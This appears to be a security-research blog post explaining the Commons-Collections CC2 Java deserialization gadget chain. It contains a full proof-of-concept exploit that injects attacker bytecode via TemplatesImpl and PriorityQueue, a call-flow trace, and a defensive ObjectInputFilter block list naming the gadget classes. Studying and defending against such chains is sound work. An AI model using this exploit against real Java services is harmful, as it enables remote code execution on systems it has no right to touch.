
Java Deserialization: the Commons-Collections CC2 Chain

Java deserialization chains: the CC2 chain

Chain diagram (image not included in this copy)

The CC2 chain comes down to linking InstantiateTransformer with InvokerTransformer, and InvokerTransformer with TemplatesImpl.

InstantiateTransformer → InvokerTransformer

The transformer field is set to an InvokerTransformer.

InvokerTransformer → TemplatesImpl

InvokerTransformer's transform() invokes a method via reflection, so here it can reflectively call TemplatesImpl's newTransformer(), which links the two together.

How does TemplatesImpl get passed in?

Whatever is passed to add() becomes the argument to transform().

To reach TemplatesImpl.newTransformer(), the object passed to add() must be the TemplatesImpl instance:

```java
priorityQueue.add(templates);
priorityQueue.add(templates);
```

Full exp

```java
// Build a TemplatesImpl whose private fields point at the attacker-controlled bytecode
TemplatesImpl templates = new TemplatesImpl();
Class templatesClass = templates.getClass();
Field nameField = templatesClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates, "Y9sR");

Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] evil = Files.readAllBytes(Paths.get("E://calc.class"));
byte[][] codes = {evil};
bytecodesField.set(templates, codes);

// InvokerTransformer that reflectively calls newTransformer() on whatever it is given
InvokerTransformer invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
//        invokerTransformer.transform(templates);

// Start with a harmless ConstantTransformer so that add() does not trigger the chain locally
TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));

PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(templates);

// Swap in the InvokerTransformer only after the queue is populated
Class c = TransformingComparator.class;
Field field1 = c.getDeclaredField("transformer");
field1.setAccessible(true);
field1.set(transformingComparator, invokerTransformer);
//        serialize(priorityQueue);
unserialize("ser.bin");
```

But nothing pops, which is strange; when debugging I can get as far as TemplatesImpl's defineClass.

Call flow

```text
PriorityQueue.readObject()
  PriorityQueue.heapify()
    PriorityQueue.siftDown()
      PriorityQueue.siftDownUsingComparator()
        TransformingComparator.compare()
          InvokerTransformer.transform()
            TemplatesImpl.newTransformer()
                TemplatesImpl.getTransletInstance()
                  TemplatesImpl.defineTransletClasses()
                    TemplatesImpl.defineClass()
                      ClassLoader.defineClass()
                        newInstance
```
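Since the whole chain starts inside PriorityQueue.readObject(), the defensive counterpart is to stop the stream before that method ever runs. The following is an added example (not code from the original post) of a JDK 9+ ObjectInputFilter that rejects the classes this chain depends on and allow-lists only the types an application actually expects; the class and package names are the real ones used by the chain above, and the allow-list is an assumed stand-in for whatever a given application legitimately deserializes.

```java
import java.io.*;
import java.util.PriorityQueue;

public class CC2DeserializationGuard {
    // Reject the CC2 gadget classes explicitly, allow the few types we expect,
    // and reject everything else ("!*") so unknown gadget chains fail closed.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;"
      + "!org.apache.commons.collections4.**;"
      + "!org.apache.commons.collections.**;"
      + "java.lang.String;java.lang.Integer;!*");   // assumed application allow-list

    // Deserialize with the filter installed; a rejected class raises
    // InvalidClassException before the class's readObject() is reached.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Allowed type: passes the filter and is returned normally
        System.out.println("allowed: " + readFiltered(serialize("hello")));

        // PriorityQueue is not allow-listed, so the stream is rejected at the class
        // descriptor and PriorityQueue.readObject() -> heapify() never executes.
        PriorityQueue<Integer> queue = new PriorityQueue<>();
        queue.add(1);
        try {
            readFiltered(serialize(queue));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied process-wide with the `jdk.serialFilter` system property instead of per stream, which also covers deserialization paths the application does not control directly.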
Last updated Mar 03, 2025 07:35 UTC